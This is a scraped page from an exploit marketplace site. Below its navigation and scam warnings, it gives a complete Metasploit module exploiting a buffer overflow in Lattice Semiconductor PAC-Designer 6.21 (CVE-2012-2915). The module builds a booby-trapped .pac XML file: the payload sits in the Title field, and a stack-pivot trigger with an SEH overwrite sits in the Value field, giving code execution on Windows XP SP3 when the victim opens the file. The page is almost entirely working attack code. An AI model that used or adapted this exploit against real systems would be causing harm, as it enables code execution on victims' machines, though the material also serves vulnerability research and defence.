0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT def initialize(info={}) super(update_info(info, 'Name' => "Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow", 'Description' => %q{ This module exploits a vulnerability found in Lattice Semiconductor PAC-Designer 6.21. As a .pac file, when supplying a long string of data to the 'value' field under the 'SymbolicSchematicData' tag, it is possible to cause a memory corruption on the stack, which results in arbitrary code execution under the context of the user. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', #Discovery 'juan vazquez', #Metasploit 'sinn3r' #Metasploit ], 'References' => [ ['CVE', '2012-2915'], ['OSVDB', '82001'], ['EDB', '19006'], ['BID', '53566'], ['URL', 'http://secunia.com/advisories/48741'] ], 'Payload' => { 'BadChars' => "\x00\x3c\x3e", 'StackAdjustment' => -3500, }, 'DefaultOptions' => { 'ExitFunction' => "seh" }, 'Platform' => 'win', 'Targets' => [ [ 'PAC-Designer 6.21 on Windows XP SP3', { # P/P/R in PACD621.exe # ASLR: False, Rebase: False, SafeSEH: False, OS: False 'Ret' => 0x00805020 } ], ], 'Privileged' => false, 'DisclosureDate' => "May 16 2012", 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [true, 'The filename', 'msf.pac']) ], self.class) end def exploit # The payload is placed in the <title> field p = payload.encoded # The trigger is placed in the <value> field, which will jmp to our # payload in the <title> field. buf = "\x5f" #POP EDI buf << "\x5f" #POP EDI buf << "\x5c" #POP ESP buf << "\x61"*6 #POPAD x 6 buf << "\x51" #PUSH ECX buf << "\xc3" #RET buf << rand_text_alpha(96-buf.length, payload_badchars) buf << "\xeb\x9e#{rand_text_alpha(2, payload_badchars)}" #Jmp back to the beginning of the buffer buf << [target.ret].pack('V')[0,3] # Partial overwrite xml = %Q|<?xml version="1.0"?> <PacDesignData> <DocFmtVersion>1</DocFmtVersion> <DeviceType>ispPAC-CLK5410D</DeviceType> <CreatedBy>PAC-Designer 6.21.1336</CreatedBy> <SummaryInformation> <Title>#{p}</Title> <Author>#{Rex::Text.rand_text_alpha(6)}</Author> </SummaryInformation> <SymbolicSchematicData> <Symbol> <SymKey>153</SymKey> <NameText>Profile 0 Ref Frequency</NameText> <Value>#{buf}</Value> </Symbol> </SymbolicSchematicData> </PacDesignData>| file_create(xml) end end # 0day.today [2024-07-02] #